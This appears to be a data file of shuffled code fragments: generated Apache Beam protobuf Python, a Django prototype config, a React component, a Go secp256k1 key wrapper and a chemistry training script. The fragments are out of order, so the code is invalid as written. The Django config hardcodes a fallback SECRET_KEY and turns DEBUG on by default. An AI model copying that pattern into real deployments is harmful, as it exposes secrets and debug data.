_sym_db.RegisterMessage(Trigger.AfterProcessingTime)
_sym_db.RegisterMessage(Trigger.AfterSynchronizedProcessingTime)
_sym_db.RegisterMessage(Trigger.Default)
_sym_db.RegisterMessage(Trigger.ElementCount)
_sym_db.RegisterMessage(Trigger.Never)
_sym_db.RegisterMessage(Trigger.Always)
_sym_db.RegisterMessage(Trigger.OrFinally)
_sym_db.RegisterMessage(Trigger.Repeat)
TimestampTransform = _reflection.GeneratedProtocolMessageType('TimestampTransform', (_message.Message,), dict(
Delay = _reflection.GeneratedProtocolMessageType('Delay', (_message.Message,), dict(
DESCRIPTOR = _TIMESTAMPTRANSFORM_DELAY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform.Delay)
))
,
AlignTo = _reflection.GeneratedProtocolMessageType('AlignTo', (_message.Message,), dict(
DESCRIPTOR = _TIMESTAMPTRANSFORM_ALIGNTO,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo)
))
,
DESCRIPTOR = _TIMESTAMPTRANSFORM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform)
))
_sym_db.RegisterMessage(TimestampTransform)
_sym_db.RegisterMessage(TimestampTransform.Delay)
_sym_db.RegisterMessage(TimestampTransform.AlignTo)
SideInput = _reflection.GeneratedProtocolMessageType('SideInput', (_message.Message,), dict(
DESCRIPTOR = _SIDEINPUT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SideInput)
))
_sym_db.RegisterMessage(SideInput)
Environment = _reflection.GeneratedProtocolMessageType('Environment', (_message.Message,), dict(
DESCRIPTOR = _ENVIRONMENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Environment)
))
_sym_db.RegisterMessage(Environment)
StandardEnvironments = _reflection.GeneratedProtocolMessageType('StandardEnvironments', (_message.Message,), dict(
DESCRIPTOR = _STANDARDENVIRONMENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardEnvironments)
))
_sym_db.RegisterMessage(StandardEnvironments)
DockerPayload = _reflection.GeneratedProtocolMessageType('DockerPayload', (_message.Message,), dict(
DESCRIPTOR = _DOCKERPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DockerPayload)
))
_sym_db.RegisterMessage(DockerPayload)
ProcessPayload = _reflection.GeneratedProtocolMessageType('ProcessPayload', (_message.Message,), dict(
EnvEntry = _reflection.GeneratedProtocolMessageType('EnvEntry', (_message.Message,), dict(
DESCRIPTOR = _PROCESSPAYLOAD_ENVENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry)
))
,
DESCRIPTOR = _PROCESSPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ProcessPayload)
))
_sym_db.RegisterMessage(ProcessPayload)
_sym_db.RegisterMessage(ProcessPayload.EnvEntry)
SdkFunctionSpec = _reflection.GeneratedProtocolMessageType('SdkFunctionSpec', (_message.Message,), dict(
DESCRIPTOR = _SDKFUNCTIONSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SdkFunctionSpec)
))
_sym_db.RegisterMessage(SdkFunctionSpec)
FunctionSpec = _reflection.GeneratedProtocolMessageType('FunctionSpec', (_message.Message,), dict(
DESCRIPTOR = _FUNCTIONSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.FunctionSpec)
))
_sym_db.RegisterMessage(FunctionSpec)
DisplayData = _reflection.GeneratedProtocolMessageType('DisplayData', (_message.Message,), dict(
Identifier = _reflection.GeneratedProtocolMessageType('Identifier', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_IDENTIFIER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Identifier)
))
,
Item = _reflection.GeneratedProtocolMessageType('Item', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_ITEM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Item)
))
,
Type = _reflection.GeneratedProtocolMessageType('Type', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_TYPE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Type)
))
,
DESCRIPTOR = _DISPLAYDATA,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData)
))
_sym_db.RegisterMessage(DisplayData)
_sym_db.RegisterMessage(DisplayData.Identifier)
_sym_db.RegisterMessage(DisplayData.Item)
_sym_db.RegisterMessage(DisplayData.Type)
MessageWithComponents = _reflection.GeneratedProtocolMessageType('MessageWithComponents', (_message.Message,), dict(
DESCRIPTOR = _MESSAGEWITHCOMPONENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MessageWithComponents)
))
_sym_db.RegisterMessage(MessageWithComponents)
ExecutableStagePayload = _reflection.GeneratedProtocolMessageType('ExecutableStagePayload', (_message.Message,), dict(
SideInputId = _reflection.GeneratedProtocolMessageType('SideInputId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_SIDEINPUTID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId)
))
,
UserStateId = _reflection.GeneratedProtocolMessageType('UserStateId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_USERSTATEID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId)
))
,
TimerId = _reflection.GeneratedProtocolMessageType('TimerId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_TIMERID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId)
))
,
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload)
))
_sym_db.RegisterMessage(ExecutableStagePayload)
_sym_db.RegisterMessage(ExecutableStagePayload.SideInputId)
_sym_db.RegisterMessage(ExecutableStagePayload.UserStateId)
_sym_db.RegisterMessage(ExecutableStagePayload.TimerId)
google_dot_protobuf_dot_descriptor__pb2.EnumValueOptions.RegisterExtension(beam_urn)
google_dot_protobuf_dot_descriptor__pb2.EnumValueOptions.RegisterExtension(beam_constant)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n!org.apache.beam.model.pipeline.v1B\tRunnerApiZ\013pipeline_v1'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["MIN_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["MIN_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\021-9223372036854775'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["MAX_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["MAX_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223372036854775'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223371950454775'))
_COMPONENTS_TRANSFORMSENTRY.has_options = True
_COMPONENTS_TRANSFORMSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_PCOLLECTIONSENTRY.has_options = True
_COMPONENTS_PCOLLECTIONSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.has_options = True
_COMPONENTS_WINDOWINGSTRATEGIESENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_CODERSENTRY.has_options = True
_COMPONENTS_CODERSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_ENVIRONMENTSENTRY.has_options = True
_COMPONENTS_ENVIRONMENTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PTRANSFORM_INPUTSENTRY.has_options = True
_PTRANSFORM_INPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PTRANSFORM_OUTPUTSENTRY.has_options = True
_PTRANSFORM_OUTPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["PAR_DO"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["PAR_DO"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033urn:beam:transform:pardo:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["FLATTEN"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["FLATTEN"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:flatten:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["GROUP_BY_KEY"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["GROUP_BY_KEY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\036beam:transform:group_by_key:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["IMPULSE"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["IMPULSE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:impulse:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["ASSIGN_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["ASSIGN_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:window_into:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["TEST_STREAM"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["TEST_STREAM"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 urn:beam:transform:teststream:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MAP_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MAP_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:map_windows:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MERGE_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MERGE_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\037beam:transform:merge_windows:v1'))
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["READ"].has_options = True
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["READ"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:transform:read:v1'))
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["CREATE_VIEW"].has_options = True
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["CREATE_VIEW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:create_view:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_PER_KEY"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_PER_KEY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005!beam:transform:combine_per_key:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_GLOBALLY"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_GLOBALLY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\"beam:transform:combine_globally:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["RESHUFFLE"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["RESHUFFLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:transform:reshuffle:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["WRITE_FILES"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["WRITE_FILES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:write_files:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PGBKCV"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PGBKCV"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 beam:transform:combine_pgbkcv:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_MERGE_ACCUMULATORS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_MERGE_ACCUMULATORS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_merge_accumulators:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_EXTRACT_OUTPUTS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_EXTRACT_OUTPUTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005)beam:transform:combine_extract_outputs:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_PRECOMBINE"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_PRECOMBINE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_per_key_precombine:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_MERGE_ACCUMULATORS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_MERGE_ACCUMULATORS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0054beam:transform:combine_per_key_merge_accumulators:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_EXTRACT_OUTPUTS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_EXTRACT_OUTPUTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0051beam:transform:combine_per_key_extract_outputs:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_GROUPED_VALUES"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_GROUPED_VALUES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005(beam:transform:combine_grouped_values:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PAIR_WITH_RESTRICTION"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PAIR_WITH_RESTRICTION"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005+beam:transform:sdf_pair_with_restriction:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["SPLIT_RESTRICTION"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["SPLIT_RESTRICTION"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\'beam:transform:sdf_split_restriction:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_KEYED_ELEMENTS"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_KEYED_ELEMENTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:sdf_process_keyed_elements:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_ELEMENTS"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_ELEMENTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005&beam:transform:sdf_process_elements:v1'))
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["ITERABLE"].has_options = True
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["ITERABLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:iterable:v1'))
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["MULTIMAP"].has_options = True
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["MULTIMAP"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:multimap:v1'))
_PARDOPAYLOAD_SIDEINPUTSENTRY.has_options = True
_PARDOPAYLOAD_SIDEINPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PARDOPAYLOAD_STATESPECSENTRY.has_options = True
_PARDOPAYLOAD_STATESPECSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PARDOPAYLOAD_TIMERSPECSENTRY.has_options = True
_PARDOPAYLOAD_TIMERSPECSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.has_options = True
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_STANDARDCODERS_ENUM.values_by_name["BYTES"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["BYTES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:bytes:v1'))
_STANDARDCODERS_ENUM.values_by_name["KV"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["KV"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\020beam:coder:kv:v1'))
_STANDARDCODERS_ENUM.values_by_name["VARINT"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["VARINT"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:coder:varint:v1'))
_STANDARDCODERS_ENUM.values_by_name["ITERABLE"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["ITERABLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:coder:iterable:v1'))
_STANDARDCODERS_ENUM.values_by_name["TIMER"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["TIMER"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:timer:v1'))
_STANDARDCODERS_ENUM.values_by_name["INTERVAL_WINDOW"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["INTERVAL_WINDOW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:coder:interval_window:v1'))
_STANDARDCODERS_ENUM.values_by_name["LENGTH_PREFIX"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["LENGTH_PREFIX"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:length_prefix:v1'))
_STANDARDCODERS_ENUM.values_by_name["GLOBAL_WINDOW"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["GLOBAL_WINDOW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:global_window:v1'))
_STANDARDCODERS_ENUM.values_by_name["WINDOWED_VALUE"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["WINDOWED_VALUE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\034beam:coder:windowed_value:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["DOCKER"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["DOCKER"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\022beam:env:docker:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["PROCESS"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["PROCESS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:env:process:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["EXTERNAL"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["EXTERNAL"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:env:external:v1'))
_PROCESSPAYLOAD_ENVENTRY.has_options = True
_PROCESSPAYLOAD_ENVENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
# @@protoc_insertion_point(module_scope) | message_type=None, enum_type=None, containing_type=None, |
prototypes.py | import sys
import os
from django.conf import settings
DEBUG = os.environ.get('DEBUG', 'on') == 'on'
SECRET_KEY = os.environ.get('SECRET_KEY', 'a^hi#2sv)yy%v(6fhlv(j@-5e%+7h*d%#g%+ru(hv-7rj08r7n'),
ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', 'localhost').split(',')
BASE_DIR = os.path.dirname(__file__)
settings.configure(
DEBUG=DEBUG,
SECRET_KEY=SECRET_KEY,
ALLOWED_HOSTS=ALLOWED_HOSTS,
ROOT_URLCONF='sitebuilder.urls',
MIDDLEWARE_CLASSES=(),
INSTALLED_APPS=(
'django.contrib.staticfiles',
'sitebuilder'
),
TEMPLATES=(
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True
}, | STATIC_URL='/static/',
SITE_PAGES_DIRECTORY=os.path.join(BASE_DIR, 'pages'),
SITE_OUTPUT_DIRECTORY=os.path.join(BASE_DIR, '_build'),
STATIC_ROOT=os.path.join(BASE_DIR, '_build', 'static'),
STATICFILES_STORAGE='django.contrib.staticfiles.storage.CachedStaticFilesStorage'
)
if __name__ == '__main__':
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv) | ), |
TableOfContentsList.tsx | import Scrollspy from 'react-scrollspy';
import {styled, themeGet} from '@twilio-paste/styling-library';
export const TableOfContentsList = styled(Scrollspy)`
position: sticky;
top: 0;
right: 0; | margin: 0;
padding: 0;
list-style: none;
border-left-width: 1px;
border-left-style: solid;
border-left-color: ${themeGet('borderColors.colorBorderWeak')};
`; | |
secp256k1.go | package crypto
import (
"bytes"
"crypto/ecdsa"
ethcrypto "github.com/ethereum/go-ethereum/crypto"
ethsecp256k1 "github.com/ethereum/go-ethereum/crypto/secp256k1"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
tmcrypto "github.com/tendermint/tendermint/crypto"
)
func init() {
authtypes.RegisterKeyTypeCodec(PubKeySecp256k1{}, PubKeyAminoName)
authtypes.RegisterKeyTypeCodec(PrivKeySecp256k1{}, PrivKeyAminoName)
}
|
// PrivKeySecp256k1 defines a type alias for an ecdsa.PrivateKey that implements
// Tendermint's PrivateKey interface.
type PrivKeySecp256k1 []byte
// GenerateKey generates a new random private key. It returns an error upon
// failure.
func GenerateKey() (PrivKeySecp256k1, error) {
priv, err := ethcrypto.GenerateKey()
if err != nil {
return PrivKeySecp256k1{}, err
}
return PrivKeySecp256k1(ethcrypto.FromECDSA(priv)), nil
}
// PubKey returns the ECDSA private key's public key.
func (privkey PrivKeySecp256k1) PubKey() tmcrypto.PubKey {
ecdsaPKey := privkey.ToECDSA()
return PubKeySecp256k1(ethcrypto.FromECDSAPub(&ecdsaPKey.PublicKey))
}
// Bytes returns the raw ECDSA private key bytes.
func (privkey PrivKeySecp256k1) Bytes() []byte {
return cryptoCodec.MustMarshalBinaryBare(privkey)
}
// Sign creates a recoverable ECDSA signature on the secp256k1 curve over the
// Keccak256 hash of the provided message. The produced signature is 65 bytes
// where the last byte contains the recovery ID.
func (privkey PrivKeySecp256k1) Sign(msg []byte) ([]byte, error) {
return ethcrypto.Sign(ethcrypto.Keccak256Hash(msg).Bytes(), privkey.ToECDSA())
}
// Equals returns true if two ECDSA private keys are equal and false otherwise.
func (privkey PrivKeySecp256k1) Equals(other tmcrypto.PrivKey) bool {
if other, ok := other.(PrivKeySecp256k1); ok {
return bytes.Equal(privkey.Bytes(), other.Bytes())
}
return false
}
// ToECDSA returns the ECDSA private key as a reference to ecdsa.PrivateKey type.
func (privkey PrivKeySecp256k1) ToECDSA() *ecdsa.PrivateKey {
key, _ := ethcrypto.ToECDSA(privkey)
return key
}
// ----------------------------------------------------------------------------
// secp256k1 Public Key
var _ tmcrypto.PubKey = (*PubKeySecp256k1)(nil)
// PubKeySecp256k1 defines a type alias for an ecdsa.PublicKey that implements
// Tendermint's PubKey interface.
type PubKeySecp256k1 []byte
// Address returns the address of the ECDSA public key.
func (key PubKeySecp256k1) Address() tmcrypto.Address {
pubk, _ := ethcrypto.UnmarshalPubkey(key)
return tmcrypto.Address(ethcrypto.PubkeyToAddress(*pubk).Bytes())
}
// Bytes returns the raw bytes of the ECDSA public key.
func (key PubKeySecp256k1) Bytes() []byte {
bz, err := cryptoCodec.MarshalBinaryBare(key)
if err != nil {
panic(err)
}
return bz
}
// VerifyBytes verifies that the ECDSA public key created a given signature over
// the provided message. It will calculate the Keccak256 hash of the message
// prior to verification.
func (key PubKeySecp256k1) VerifyBytes(msg []byte, sig []byte) bool {
if len(sig) == 65 {
// remove recovery ID if contained in the signature
sig = sig[:len(sig)-1]
}
// the signature needs to be in [R || S] format when provided to VerifySignature
return ethsecp256k1.VerifySignature(key, ethcrypto.Keccak256Hash(msg).Bytes(), sig)
}
// Equals returns true if two ECDSA public keys are equal and false otherwise.
func (key PubKeySecp256k1) Equals(other tmcrypto.PubKey) bool {
if other, ok := other.(PubKeySecp256k1); ok {
return bytes.Equal(key.Bytes(), other.Bytes())
}
return false
} | // ----------------------------------------------------------------------------
// secp256k1 Private Key
var _ tmcrypto.PrivKey = PrivKeySecp256k1{} |
chem_train_single.py | ''' | All rights reserved.
@author: neilswainston
'''
# pylint: disable=invalid-name
# pylint: disable=no-member
# pylint: disable=wrong-import-order
from rdkit import Chem
import scipy
from gae.tf import train_single
import numpy as np
import pandas as pd
def _load_data(filename):
'''Load data.'''
df = pd.read_csv(filename)
smiles = df['smiles'][0]
adj, features = _get_data(smiles)
return adj, features
def _get_data(smiles):
'''Get data from SMILES.'''
mol = Chem.MolFromSmiles(smiles)
adj = scipy.sparse.lil_matrix(
(mol.GetNumAtoms(), mol.GetNumAtoms()), dtype=int)
for bond in mol.GetBonds():
adj[bond.GetBeginAtomIdx(), bond.GetEndAtomIdx()] = 1
features = np.array([[atom.GetAtomicNum(),
atom.GetMass(),
atom.GetExplicitValence(),
atom.GetFormalCharge()]
for atom in mol.GetAtoms()])
return scipy.sparse.csr_matrix(adj), scipy.sparse.lil_matrix(features)
def main():
'''main method.'''
# Load data:
filename = 'data/spectra.csv'
adj, features = _load_data(filename)
# Train:
train_single.train(adj, features, epochs=10000)
if __name__ == '__main__':
main() | (c) University of Liverpool 2020
|
init.go | package core
import (
"fmt"
"regexp"
"strings"
"unicode"
"github.com/dosco/super-graph/core/internal/psql"
"github.com/dosco/super-graph/core/internal/qcode"
"github.com/gobuffalo/flect"
)
